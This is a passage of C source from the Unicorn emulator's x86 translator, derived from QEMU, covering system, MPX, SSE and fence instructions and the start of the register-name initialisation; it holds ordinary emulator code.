tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_wrpkru(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->tmp1_i64); break; CASE_MODRM_OP(6): /* lmsw */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); gen_helper_lmsw(tcg_ctx, tcg_ctx->cpu_env, s->T0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; CASE_MODRM_MEM_OP(7): /* invlpg */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_lea_modrm(env, s, modrm); gen_helper_invlpg(tcg_ctx, tcg_ctx->cpu_env, s->A0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xf8: /* swapgs */ #ifdef TARGET_X86_64 if (CODE64(s)) { if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { tcg_gen_mov_tl(tcg_ctx, s->T0, tcg_ctx->cpu_seg_base[R_GS]); tcg_gen_ld_tl(tcg_ctx, tcg_ctx->cpu_seg_base[R_GS], tcg_ctx->cpu_env, offsetof(CPUX86State, kernelgsbase)); tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, kernelgsbase)); } break; } #endif goto illegal_op; case 0xf9: /* rdtscp */ if (!(s->cpuid_ext2_features & CPUID_EXT2_RDTSCP)) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdtscp(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; default: goto unknown_op; } break; case 0x108: /* invd */ case 0x109: /* wbinvd */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, (b & 2) ? SVM_EXIT_INVD : SVM_EXIT_WBINVD); /* nothing to do */ } break; case 0x63: /* arpl or movslS (x86_64) */ #ifdef TARGET_X86_64 if (CODE64(s)) { int d_ot; /* d_ot is the size of destination */ d_ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod == 3) { gen_op_mov_v_reg(s, MO_32, s->T0, rm); /* sign extend */ if (d_ot == MO_64) { tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); } gen_op_mov_reg_v(s, d_ot, reg, s->T0); } else { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_32 | MO_SIGN, s->T0, s->A0); gen_op_mov_reg_v(s, d_ot, reg, s->T0); } } else #endif { TCGLabel *label1; TCGv t0, t1, t2, a0; if (!s->pe || s->vm86) goto illegal_op; t0 = tcg_temp_local_new(tcg_ctx); t1 = tcg_temp_local_new(tcg_ctx); t2 = tcg_temp_local_new(tcg_ctx); ot = MO_16; modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; rm = modrm & 7; if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, t0, s->A0); a0 = tcg_temp_local_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, a0, s->A0); } else { gen_op_mov_v_reg(s, ot, t0, rm); a0 = NULL; } gen_op_mov_v_reg(s, ot, t1, reg); tcg_gen_andi_tl(tcg_ctx, s->tmp0, t0, 3); tcg_gen_andi_tl(tcg_ctx, t1, t1, 3); tcg_gen_movi_tl(tcg_ctx, t2, 0); label1 = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, s->tmp0, t1, label1); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_movi_tl(tcg_ctx, t2, CC_Z); gen_set_label(tcg_ctx, label1); if (mod != 3) { gen_op_st_v(s, ot, t0, a0); tcg_temp_free(tcg_ctx, a0); } else { gen_op_mov_reg_v(s, ot, rm, t0); } gen_compute_eflags(s); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, ~CC_Z); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } break; case 0x102: /* lar */ case 0x103: /* lsl */ { TCGLabel *label1; TCGv t0; if (!s->pe || s->vm86) goto illegal_op; ot = dflag != MO_16 ? MO_32 : MO_16; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); t0 = tcg_temp_local_new(tcg_ctx); gen_update_cc_op(s); if (b == 0x102) { gen_helper_lar(tcg_ctx, t0, tcg_ctx->cpu_env, s->T0); } else { gen_helper_lsl(tcg_ctx, t0, tcg_ctx->cpu_env, s->T0); } tcg_gen_andi_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, CC_Z); label1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, s->tmp0, 0, label1); gen_op_mov_reg_v(s, ot, reg, t0); gen_set_label(tcg_ctx, label1); set_cc_op(s, CC_OP_EFLAGS); tcg_temp_free(tcg_ctx, t0); } break; case 0x118: modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; op = (modrm >> 3) & 7; switch(op) { case 0: /* prefetchnta */ case 1: /* prefetchnt0 */ case 2: /* prefetchnt0 */ case 3: /* prefetchnt0 */ if (mod == 3) goto illegal_op; gen_nop_modrm(env, s, modrm); /* nothing more to do */ break; default: /* nop (multi byte) */ gen_nop_modrm(env, s, modrm); break; } break; case 0x11a: modrm = x86_ldub_code(env, s); if (s->flags & HF_MPX_EN_MASK) { mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; if (prefixes & PREFIX_REPZ) { /* bndcl */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } gen_bndck(env, s, modrm, TCG_COND_LTU, tcg_ctx->cpu_bndl[reg]); } else if (prefixes & PREFIX_REPNZ) { /* bndcu */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } TCGv_i64 notu = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, notu, tcg_ctx->cpu_bndu[reg]); gen_bndck(env, s, modrm, TCG_COND_GTU, notu); tcg_temp_free_i64(tcg_ctx, notu); } else if (prefixes & PREFIX_DATA) { /* bndmov -- from reg/mem */ if (reg >= 4 || s->aflag == MO_16) { goto illegal_op; } if (mod == 3) { int reg2 = (modrm & 7) | REX_B(s); if (reg2 >= 4 || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if (s->flags & HF_MPX_IU_MASK) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndl[reg2]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_bndu[reg2]); } } else { gen_lea_modrm(env, s, modrm); if (CODE64(s)) { tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEQ); } else { tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 4); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEUL); } /* bnd registers are now in-use */ gen_set_hflag(s, HF_MPX_IU_MASK); } } else if (mod != 3) { /* bndldx */ AddressParts a = gen_lea_modrm_0(env, s, modrm); if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16 || a.base < -1) { goto illegal_op; } if (a.base >= 0) { tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[a.base], a.disp); } else { tcg_gen_movi_tl(tcg_ctx, s->A0, 0); } gen_lea_v_seg(s, s->aflag, s->A0, a.def_seg, s->override); if (a.index >= 0) { tcg_gen_mov_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[a.index]); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, 0); } if (CODE64(s)) { gen_helper_bndldx64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_env, s->A0, s->T0); tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_env, offsetof(CPUX86State, mmx_t0.MMX_Q(0))); } else { gen_helper_bndldx32(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_env, s->A0, s->T0); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndu[reg]); tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_bndu[reg], 32); } gen_set_hflag(s, HF_MPX_IU_MASK); } } gen_nop_modrm(env, s, modrm); break; case 0x11b: modrm = x86_ldub_code(env, s); if (s->flags & HF_MPX_EN_MASK) { mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; if (mod != 3 && (prefixes & PREFIX_REPZ)) { /* bndmk */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } AddressParts a = gen_lea_modrm_0(env, s, modrm); if (a.base >= 0) { tcg_gen_extu_tl_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_regs[a.base]); if (!CODE64(s)) { tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndl[reg]); } } else if (a.base == -1) { /* no base register has lower bound of 0 */ tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], 0); } else { /* rip-relative generates #ud */ goto illegal_op; } tcg_gen_not_tl(tcg_ctx, s->A0, gen_lea_modrm_1(s, a)); if (!CODE64(s)) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0); } tcg_gen_extu_tl_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0); /* bnd registers are now in-use */ gen_set_hflag(s, HF_MPX_IU_MASK); break; } else if (prefixes & PREFIX_REPNZ) { /* bndcn */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } gen_bndck(env, s, modrm, TCG_COND_GTU, tcg_ctx->cpu_bndu[reg]); } else if (prefixes & PREFIX_DATA) { /* bndmov -- to reg/mem */ if (reg >= 4 || s->aflag == MO_16) { goto illegal_op; } if (mod == 3) { int reg2 = (modrm & 7) | REX_B(s); if (reg2 >= 4 || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if (s->flags & HF_MPX_IU_MASK) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg2], tcg_ctx->cpu_bndl[reg]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg2], tcg_ctx->cpu_bndu[reg]); } } else { gen_lea_modrm(env, s, modrm); if (CODE64(s)) { tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 8); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEQ); } else { tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 4); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEUL); } } } else if (mod != 3) { /* bndstx */ AddressParts a = gen_lea_modrm_0(env, s, modrm); if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16 || a.base < -1) { goto illegal_op; } if (a.base >= 0) { tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[a.base], a.disp); } else { tcg_gen_movi_tl(tcg_ctx, s->A0, 0); } gen_lea_v_seg(s, s->aflag, s->A0, a.def_seg, s->override); if (a.index >= 0) { tcg_gen_mov_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[a.index]); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, 0); } if (CODE64(s)) { gen_helper_bndstx64(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->T0, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndu[reg]); } else { gen_helper_bndstx32(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->T0, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndu[reg]); } } } gen_nop_modrm(env, s, modrm); break; case 0x119: case 0x11c: /* nop (multi byte) */ case 0x11d: /* nop (multi byte) */ case 0x11e: /* nop (multi byte) */ case 0x11f: /* nop (multi byte) */ modrm = x86_ldub_code(env, s); gen_nop_modrm(env, s, modrm); break; case 0x120: /* mov reg, crN */ case 0x122: /* mov crN, reg */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { modrm = x86_ldub_code(env, s); /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). * AMD documentation (24594.pdf) and testing of * intel 386 and 486 processors all show that the mod bits * are assumed to be 1's, regardless of actual values. */ rm = (modrm & 7) | REX_B(s); reg = ((modrm >> 3) & 7) | rex_r; if (CODE64(s)) ot = MO_64; else ot = MO_32; if ((prefixes & PREFIX_LOCK) && (reg == 0) && (s->cpuid_ext3_features & CPUID_EXT3_CR8LEG)) { reg = 8; } switch(reg) { case 0: case 2: case 3: case 4: case 8: gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (b & 2) { if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_op_mov_v_reg(s, ot, s->T0, rm); gen_helper_write_crN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, reg), s->T0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } else { if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_read_crN(tcg_ctx, s->T0, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, reg)); gen_op_mov_reg_v(s, ot, rm, s->T0); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } } break; default: goto unknown_op; } } break; case 0x121: /* mov reg, drN */ case 0x123: /* mov drN, reg */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { modrm = x86_ldub_code(env, s); /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). * AMD documentation (24594.pdf) and testing of * intel 386 and 486 processors all show that the mod bits * are assumed to be 1's, regardless of actual values. */ rm = (modrm & 7) | REX_B(s); reg = ((modrm >> 3) & 7) | rex_r; if (CODE64(s)) ot = MO_64; else ot = MO_32; if (reg >= 8) { goto illegal_op; } if (b & 2) { gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_DR0 + reg); gen_op_mov_v_reg(s, ot, s->T0, rm); tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, reg); gen_helper_set_dr(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_DR0 + reg); tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, reg); gen_helper_get_dr(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->tmp2_i32); gen_op_mov_reg_v(s, ot, rm, s->T0); } } break; case 0x106: /* clts */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); gen_helper_clts(tcg_ctx, tcg_ctx->cpu_env); /* abort block because static cpu state changed */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; /* MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4 support */ case 0x1c3: /* MOVNTI reg, mem */ if (!(s->cpuid_features & CPUID_SSE2)) goto illegal_op; ot = mo_64_32(dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; reg = ((modrm >> 3) & 7) | rex_r; /* generate a generic store */ gen_ldst_modrm(env, s, modrm, ot, reg, 1); break; case 0x1ae: modrm = x86_ldub_code(env, s); switch (modrm) { CASE_MODRM_MEM_OP(0): /* fxsave */ if (!(s->cpuid_features & CPUID_FXSR) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); gen_helper_fxsave(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; CASE_MODRM_MEM_OP(1): /* fxrstor */ if (!(s->cpuid_features & CPUID_FXSR) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); gen_helper_fxrstor(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; CASE_MODRM_MEM_OP(2): /* ldmxcsr */ if ((s->flags & HF_EM_MASK) || !(s->flags & HF_OSFXSR_MASK)) { goto illegal_op; } if (s->flags & HF_TS_MASK) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_ldmxcsr(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; CASE_MODRM_MEM_OP(3): /* stmxcsr */ if ((s->flags & HF_EM_MASK) || !(s->flags & HF_OSFXSR_MASK)) { goto illegal_op; } if (s->flags & HF_TS_MASK) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, mxcsr)); gen_op_st_v(s, MO_32, s->T0, s->A0); break; CASE_MODRM_MEM_OP(4): /* xsave */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (prefixes & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); gen_helper_xsave(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp1_i64); break; CASE_MODRM_MEM_OP(5): /* xrstor */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (prefixes & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); gen_helper_xrstor(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp1_i64); /* XRSTOR is how MPX is enabled, which changes how we translate. Thus we need to end the TB. */ gen_update_cc_op(s); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; CASE_MODRM_MEM_OP(6): /* xsaveopt / clwb */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } if (prefixes & PREFIX_DATA) { /* clwb */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_CLWB)) { goto illegal_op; } gen_nop_modrm(env, s, modrm); } else { /* xsaveopt */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (s->cpuid_xsave_features & CPUID_XSAVE_XSAVEOPT) == 0 || (prefixes & (PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); gen_helper_xsaveopt(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp1_i64); } break; CASE_MODRM_MEM_OP(7): /* clflush / clflushopt */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } if (prefixes & PREFIX_DATA) { /* clflushopt */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_CLFLUSHOPT)) { goto illegal_op; } } else { /* clflush */ if ((s->prefix & (PREFIX_REPZ | PREFIX_REPNZ)) || !(s->cpuid_features & CPUID_CLFLUSH)) { goto illegal_op; } } gen_nop_modrm(env, s, modrm); break; case 0xc0: /* rdfsbase (f3 0f ae /0) */ case 0xc1: /* rdfsbase (f3 0f ae /0) */ case 0xc2: /* rdfsbase (f3 0f ae /0) */ case 0xc3: /* rdfsbase (f3 0f ae /0) */ case 0xc4: /* rdfsbase (f3 0f ae /0) */ case 0xc5: /* rdfsbase (f3 0f ae /0) */ case 0xc6: /* rdfsbase (f3 0f ae /0) */ case 0xc7: /* rdfsbase (f3 0f ae /0) */ case 0xc8: /* rdgsbase (f3 0f ae /1) */ case 0xc9: /* rdgsbase (f3 0f ae /1) */ case 0xca: /* rdgsbase (f3 0f ae /1) */ case 0xcb: /* rdgsbase (f3 0f ae /1) */ case 0xcc: /* rdgsbase (f3 0f ae /1) */ case 0xcd: /* rdgsbase (f3 0f ae /1) */ case 0xce: /* rdgsbase (f3 0f ae /1) */ case 0xcf: /* rdgsbase (f3 0f ae /1) */ case 0xd0: /* wrfsbase (f3 0f ae /2) */ case 0xd1: /* wrfsbase (f3 0f ae /2) */ case 0xd2: /* wrfsbase (f3 0f ae /2) */ case 0xd3: /* wrfsbase (f3 0f ae /2) */ case 0xd4: /* wrfsbase (f3 0f ae /2) */ case 0xd5: /* wrfsbase (f3 0f ae /2) */ case 0xd6: /* wrfsbase (f3 0f ae /2) */ case 0xd7: /* wrfsbase (f3 0f ae /2) */ case 0xd8: /* wrgsbase (f3 0f ae /3) */ case 0xd9: /* wrgsbase (f3 0f ae /3) */ case 0xda: /* wrgsbase (f3 0f ae /3) */ case 0xdb: /* wrgsbase (f3 0f ae /3) */ case 0xdc: /* wrgsbase (f3 0f ae /3) */ case 0xdd: /* wrgsbase (f3 0f ae /3) */ case 0xde: /* wrgsbase (f3 0f ae /3) */ case 0xdf: /* wrgsbase (f3 0f ae /3) */ if (CODE64(s) && (prefixes & PREFIX_REPZ) && !(prefixes & PREFIX_LOCK) && (s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_FSGSBASE)) { TCGv base, treg, src, dst; /* Preserve hflags bits by testing CR4 at runtime. */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, CR4_FSGSBASE_MASK); gen_helper_cr4_testbit(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); base = tcg_ctx->cpu_seg_base[modrm & 8 ? R_GS : R_FS]; treg = tcg_ctx->cpu_regs[(modrm & 7) | REX_B(s)]; if (modrm & 0x10) { /* wr*base */ dst = base, src = treg; } else { /* rd*base */ dst = treg, src = base; } if (s->dflag == MO_32) { tcg_gen_ext32u_tl(tcg_ctx, dst, src); } else { tcg_gen_mov_tl(tcg_ctx, dst, src); } break; } goto unknown_op; case 0xf8: /* sfence / pcommit */ if (prefixes & PREFIX_DATA) { /* pcommit */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_PCOMMIT) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } break; } /* fallthru */ case 0xf9: /* sfence */ case 0xfa: /* sfence */ case 0xfb: /* sfence */ case 0xfc: /* sfence */ case 0xfd: /* sfence */ case 0xfe: /* sfence */ case 0xff: /* sfence */ if (!(s->cpuid_features & CPUID_SSE) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } tcg_gen_mb(tcg_ctx, TCG_MO_ST_ST | TCG_BAR_SC); break; case 0xe8: /* lfence */ case 0xe9: /* lfence */ case 0xea: /* lfence */ case 0xeb: /* lfence */ case 0xec: /* lfence */ case 0xed: /* lfence */ case 0xee: /* lfence */ case 0xef: /* lfence */ if (!(s->cpuid_features & CPUID_SSE) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } tcg_gen_mb(tcg_ctx, TCG_MO_LD_LD | TCG_BAR_SC); break; case 0xf0: /* mfence */ case 0xf1: /* mfence */ case 0xf2: /* mfence */ case 0xf3: /* mfence */ case 0xf4: /* mfence */ case 0xf5: /* mfence */ case 0xf6: /* mfence */ case 0xf7: /* mfence */ if (!(s->cpuid_features & CPUID_SSE2) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); break; default: goto unknown_op; } break; case 0x10d: /* 3DNow! prefetch(w) */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; gen_nop_modrm(env, s, modrm); break; case 0x1aa: /* rsm */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_RSM); if (!(s->flags & HF_SMM_MASK)) goto illegal_op; gen_update_cc_op(s); gen_jmp_im(s, s->pc - s->cs_base); gen_helper_rsm(tcg_ctx, tcg_ctx->cpu_env); gen_eob(s); break; case 0x1b8: /* SSE4.2 popcnt */ if ((prefixes & (PREFIX_REPZ | PREFIX_LOCK | PREFIX_REPNZ)) != PREFIX_REPZ) goto illegal_op; if (!(s->cpuid_ext_features & CPUID_EXT_POPCNT)) goto illegal_op; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; if (s->prefix & PREFIX_DATA) { ot = MO_16; } else { ot = mo_64_32(dflag); } gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_extu(tcg_ctx, ot, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); tcg_gen_ctpop_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, ot, reg, s->T0); set_cc_op(s, CC_OP_POPCNT); break; case 0x10e: case 0x10f: /* 3DNow! instructions, ignore prefixes */ s->prefix &= ~(PREFIX_REPZ | PREFIX_REPNZ | PREFIX_DATA); /* fall through */ case 0x110: case 0x111: case 0x112: case 0x113: case 0x114: case 0x115: case 0x116: case 0x117: case 0x128: case 0x129: case 0x12a: case 0x12b: case 0x12c: case 0x12d: case 0x12e: case 0x12f: case 0x138: case 0x139: case 0x13a: // case 0x150 ... 0x179: case 0x17c: case 0x17d: case 0x17e: case 0x17f: case 0x1c2: case 0x1c4: case 0x1c5: case 0x1c6: // case 0x1d0 ... 0x1fe: gen_sse(env, s, b, pc_start, rex_r); break; default: if (b >= 0x150 && b <= 0x179) { gen_sse(env, s, b, pc_start, rex_r); break; } if (b >= 0x1d0 && b <= 0x1fe) { gen_sse(env, s, b, pc_start, rex_r); break; } goto unknown_op; } if (insn_hook) { // Unicorn: patch the callback to have the proper instruction size. if (prev_op) { // As explained further up in the function where prev_op is // assigned, we move forward in the tail queue, so we're modifying the // move instruction generated by gen_uc_tracecode() that contains // the instruction size to assign the proper size (replacing 0xF1F1F1F1). tcg_op = QTAILQ_NEXT(prev_op, link); } else { // this instruction is the first emulated code ever, // so the operand is the first operand tcg_op = QTAILQ_FIRST(&tcg_ctx->ops); } tcg_op->args[1] = s->pc - pc_start; } return s->pc; illegal_op: gen_illegal_opcode(s); return s->pc; unknown_op: gen_unknown_opcode(env, s); return s->pc; } void tcg_x86_init(struct uc_struct *uc) { static const char reg_names[CPU_NB_REGS][4] = { #ifdef TARGET_X86_64 [R_EAX] = "rax", [R_EBX] = "rbx", [R_ECX] = "rcx", [R_EDX] = "rdx", [R_ESI] = "rsi", [R_EDI] = "rdi", [R_EBP] = "rbp", [R_ESP] = "rsp", [8] = "r8", [9] = "r9", [10] = "r10", [11] = "r11", [12] = "r12", [13] = "r13", [14] = "r14", [15] = "r15", #else [R_EAX] = "eax", [R_EBX] = "ebx", [R_ECX] = "ecx", [R_EDX] = "edx", [R_ESI] = "esi", [R_EDI] = "edi", [R_EBP] = "ebp", [R_ESP] = "esp", #endif }; static const char seg_base_names[6][8] = { [R_CS] = "cs_base", [R_DS] = "ds_base", [R_ES] = "es_base", [R_FS] = "fs_base", [R_GS] = "gs_base", [R_SS] = "ss_base", }; static const char bnd_regl_names[4][8] = { "bnd0_lb", "bnd1_lb", "bnd2_lb", "bnd3_lb" }; static const char bnd_regu_names[4][8] = { "bnd0_ub", "bnd1_ub", "bnd2_ub", "bnd3_ub" }; int i; TCGContext *tcg_ctx = 